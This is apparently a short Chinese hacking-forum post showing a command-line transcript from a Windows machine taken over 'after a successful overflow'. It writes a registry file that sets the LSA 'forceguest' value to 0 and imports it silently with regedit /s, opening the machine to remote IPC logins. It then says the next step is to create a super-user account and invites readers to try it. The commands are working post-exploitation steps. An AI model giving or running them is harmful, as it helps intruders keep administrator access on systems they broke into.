溢出成功后在对方命令行下修改注册表
c:\windows\system32>cd..
c:\windows>
c:\windows>echo windows registry
editor version 5.00>ipc1.reg
echo windows registry editor ver-
sion 5.00>ipc1.reg
c:\windows>echo [hkey_local_ma
chne\system\controlset001\control\lsa]>>
ipc1.reg
echo [hkey_local_ma
chne\system\controlset001\control\lsa]>>
ipc1.reg
c:\windows>echo "forceguest"=dword:00000000>>ipc1.reg
echo "forceguest"=dword:00000000>>ipc1.reg
c:\windows>regedit.exe /s ipc1.reg
regedit.exe /s ipc1.reg
你们试一下看看是不是可以成功
上面是建立一个reg文件ipc1.reg,然后用regedit.exe /s ipc1.reg导入到注册表中。
然后在建立一个超级用户。
|